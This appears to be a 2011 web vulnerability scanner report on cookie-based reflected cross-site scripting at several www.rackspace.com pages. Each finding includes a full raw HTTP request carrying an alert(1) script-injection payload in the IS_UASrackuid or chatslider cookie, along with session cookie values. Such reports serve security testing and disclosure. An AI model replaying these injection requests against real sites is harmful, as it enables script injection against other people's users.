GET /blog/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f838b90</script><script>alert(1)</script>389e15e9f43; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75562"><script>alert(1)</script>f69340a5b40 was submitted in the IS_UASrackuid cookie. This input was echoed as 75562\"><script>alert(1)</script>f69340a5b40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f875562"><script>alert(1)</script>f69340a5b40; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cc34"><script>alert(1)</script>66af845bb84 was submitted in the chatslider cookie. This input was echoed as 4cc34\"><script>alert(1)</script>66af845bb84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4cc34"><script>alert(1)</script>66af845bb84; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f920</script><script>alert(1)</script>b9c12074700 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1f920</script><script>alert(1)</script>b9c12074700; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6b2"><script>alert(1)</script>2f6e48ded08 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blogs/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ed6b2"><script>alert(1)</script>2f6e48ded08; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58bc9"%3balert(1)//56d204ef69d was submitted in the IS_UASrackuid cookie. This input was echoed as 58bc9";alert(1)//56d204ef69d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f858bc9"%3balert(1)//56d204ef69d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:46:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44884
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a72"><script>alert(1)</script>057e8ea858f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blogs/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=De5a72"><script>alert(1)</script>057e8ea858f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30478"%3balert(1)//e5749b93858 was submitted in the chatslider cookie. This input was echoed as 30478";alert(1)//e5749b93858 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D30478"%3balert(1)//e5749b93858; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b45b6"><script>alert(1)</script>9ffadb1af61 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /crossdomain.xml HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b45b6"><script>alert(1)</script>9ffadb1af61; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a56ad"%3balert(1)//641f8ea2c6e was submitted in the IS_UASrackuid cookie. This input was echoed as a56ad";alert(1)//641f8ea2c6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /crossdomain.xml HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a56ad"%3balert(1)//641f8ea2c6e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:46:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35526
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6fc3"><script>alert(1)</script>e0a31e74b6e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /crossdomain.xml HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc6fc3"><script>alert(1)</script>e0a31e74b6e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fca4"%3balert(1)//e66251bcdba was submitted in the chatslider cookie. This input was echoed as 4fca4";alert(1)//e66251bcdba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /crossdomain.xml HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4fca4"%3balert(1)//e66251bcdba; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f54"%3balert(1)//15dfd72b670 was submitted in the IS_UASrackuid cookie. This input was echoed as 38f54";alert(1)//15dfd72b670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/contactsales.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f838f54"%3balert(1)//15dfd72b670; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
